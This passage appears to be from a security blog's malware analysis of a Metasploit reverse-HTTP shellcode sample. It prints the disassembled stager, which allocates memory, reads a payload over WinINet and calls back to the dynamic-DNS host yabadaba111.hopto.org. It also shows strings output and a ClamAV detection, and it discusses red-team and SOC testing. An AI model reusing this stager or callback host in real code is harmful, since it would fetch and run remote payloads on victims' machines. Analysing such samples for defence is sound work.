ebx 0x0000016d 5 6858a453e5 push 0xe553a458 ; hash("kernel32.dll","VirtualAlloc") 0x00000172 2 ffd5 call ebp 0x00000174 1 93 xchg ebx, eax 0x00000175 1 53 push ebx 0x00000176 1 53 push ebx 0x00000177 2 89e7 mov edi, esp 0x00000179 1 57 push edi 0x0000017a 5 6800200000 push 0x2000 0x0000017f 1 53 push ebx 0x00000180 1 56 push esi 0x00000181 5 68129689e2 push 0xe2899612 ; hash("wininet.dll","InternetReadFile") 0x00000186 2 ffd5 call ebp 0x00000188 2 85c0 test eax, eax 0x0000018a 2 74cf jz 0x10000015b 0x0000018c 2 8b07 mov eax, [edi] 0x0000018e 2 01c3 add ebx, eax 0x00000190 2 85c0 test eax, eax 0x00000192 2 75e5 jnz 0x100000179 0x00000194 1 58 pop eax 0x00000195 1 c3 ret 0x00000196 1 5f pop edi 0x00000197 5 e877ffffff call 0x100000113 0x0000019c 2 7961 jns 0x1ff 0x0000019e 3 626164 bound esp, [ecx+0x64] 0x000001a1 1 61 popad 0x000001a2 3 626131 bound esp, [ecx+0x31] 0x000001a5 2 3131 xor [ecx], esi 0x000001a7 6 2e686f70746f push 0x6f74706f 0x000001ad 2 2e6f cs outsd 0x000001af 2 7267 jb 0x218 0x000001b1 6 00bbf0b5a256 add [ebx+0x56a2b5f0], bh 0x000001b7 2 6a00 push 0x0 0x000001b9 1 53 push ebx 0x000001ba 2 ffd5 call ebp
A simple ‘strings’ against the shellcode reveals the target of the reverse http payload. Also at this point ClamAV easily detects that this is a reverse http payload from Metasploit:
Strings ============== ;}$u D$$[[aYZQ ]hnet hwiniThLw& SSSSSh:Vy SShRZ /LWbN-ZzFSMsMYg1jVgJfHgOOer2TbTaF7UybWpXZZN-dDUlduKRruzn4hAGXuHoe55oHPw8DiTzbacW3U-eZjbhc SSSWSVh VhuF SSSSVh- yabadaba111.hopto.org Clamav ============== ../../sample.bin.data: Win.Trojan.MSShellcode-7 FOUND
yabadaba111.hopto.org does not resolve (at the time of this post)? But hopto.org is part of the No-IP and Dynamic DNS Domain-name network. So this looks like a Team/Actor preparing for a hack-attack?
Conclusion
While Netscylla still has this payload in the bag for the Red-Team, we’re less inclined to use it, due to the signature being available in so many Anti-Virus and Next-Gen security products. However, this sample is still important for assessing the Blue-Team and their infrastructure-toys ensuring that your SOC can defend against this type of attack.
Also as we can see at the end of our analysis the payload is easier identified by Anti-Virus technologies. No attempt at obfuscation or modifying the payload has been attempted. Maybe the next actor could employ more obfuscation techniques or use a custom C2 in an attempt to evade further detection and simple fingerprinting?
Share on: